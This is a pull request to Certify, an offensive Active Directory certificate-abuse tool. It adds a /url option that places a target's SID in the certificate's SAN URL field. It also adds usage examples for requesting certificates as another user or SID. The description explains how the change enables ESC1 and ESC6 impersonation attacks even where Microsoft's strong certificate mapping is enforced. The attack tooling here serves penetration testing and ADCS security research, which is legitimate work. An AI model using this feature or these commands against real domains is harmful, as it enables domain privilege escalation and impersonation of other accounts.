### PR TITLE
feat: SAN url

### DIFF
--- a/Certify/Commands/Request.cs
+++ b/Certify/Commands/Request.cs
@@ -14,6 +14,7 @@ namespace Certify.Commands
             var CA = "";
             var subject = "";
             var altName = "";
+            var url = "";
             var sidExtension = "";
             var template = "User";
             var machineContext = false;
@@ -47,6 +48,11 @@ namespace Certify.Commands
             if (arguments.ContainsKey("/altname"))
             {
                 altName = arguments["/altname"];
+            }
+
+            if (arguments.ContainsKey("/url"))
+            {
+                url = arguments["/url"];
             }
 
             if(arguments.ContainsKey("/sidextension"))
@@ -94,7 +100,7 @@ namespace Certify.Commands
             }
             else
             {
-                Cert.RequestCert(CA, machineContext, template, subject, altName, sidExtension, install);
+                Cert.RequestCert(CA, machineContext, template, subject, altName, url, sidExtension, install);
             }
         }
     }

--- a/Certify/Info.cs
+++ b/Certify/Info.cs
@@ -70,7 +70,15 @@ namespace Certify
   Request a new certificate using the current user context but for an alternate name (if supported):
 
     Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER
-    
+
+  Request a new certificate using the current user context but for an alternate name and SID (if supported):
+
+    Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER /sid:S-1-5-21-2697957641-2271029196-387917394-2136
+
+  Request a new certificate using the current user context but for an alternate name and URL (if supported):
+
+    Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER /url:tag:microsoft.com,2022-09-14:sid:S-1-5-21-2697957641-2271029196-387917394-2136
+
   Request a new certificate on behalf of another user, using an enrollment agent certificate:
     
     Certify.exe request /ca:SERVER\ca-name /template:Y /onbehalfof:DOMAIN\USER /enrollcert:C:\Temp\enroll.pfx [/enrollcertpw:CERT_PASSWORD]

--- a/README.md
+++ b/README.md
@@ -83,6 +83,14 @@ Certify is a C# tool to enumerate and abuse misconfigurations in Active Director
 
         Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER
 
+      Request a new certificate using the current user context but for an alternate name and SID (if supported):
+
+        Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER /sid:S-1-5-21-2697957641-2271029196-387917394-2136
+
+      Request a new certificate using the current user context but for an alternate name and URL (if supported):
+
+        Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER /url:tag:microsoft.com,2022-09-14:sid:S-1-5-21-2697957641-2271029196-387917394-2136
+
       Request a new certificate on behalf of another user, using an enrollment agent certificate:
 
         Certify.exe request /ca:SERVER\ca-name /template:Y /onbehalfof:DOMAIN\USER /enrollcert:C:\Temp\enroll.pfx [/enrollcertpw:CERT_PASSWORD]


### PR DESCRIPTION
This PR allows the user to specify the URL component of the SAN in the certificate request. 

Microsoft have made an alternative to the SID/security extension which is to include a "URL" component in the SAN including the SID of the target principal. This alternative is also considered as "strong mapping". Details: 
- [Preview of SAN URI for Certificate Strong Mapping for KB5014754](https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/preview-of-san-uri-for-certificate-strong-mapping-for-kb5014754/ba-p/3789785)
- [3.1.5.2.1.6 SID](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pkca/e8fd2c1d-50d3-493a-9b58-5e453850c567) 

This new URL parameter can be used as an alternative to the SID extension in an ESC1 attack. However, in an ESC6 attack, you can only specify the SAN in the cert request and not the SID extension, and URL parameter therefore enables an ESC6 attack in the case where strong certificate mapping is enforced. The ESC6 attack still requires the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA  to allow the attacker to set the SAN, and requires a cert template with the NO_SECURITY_EXTENSION to prevent the CA from adding the SID extension with the enrollee's SID. 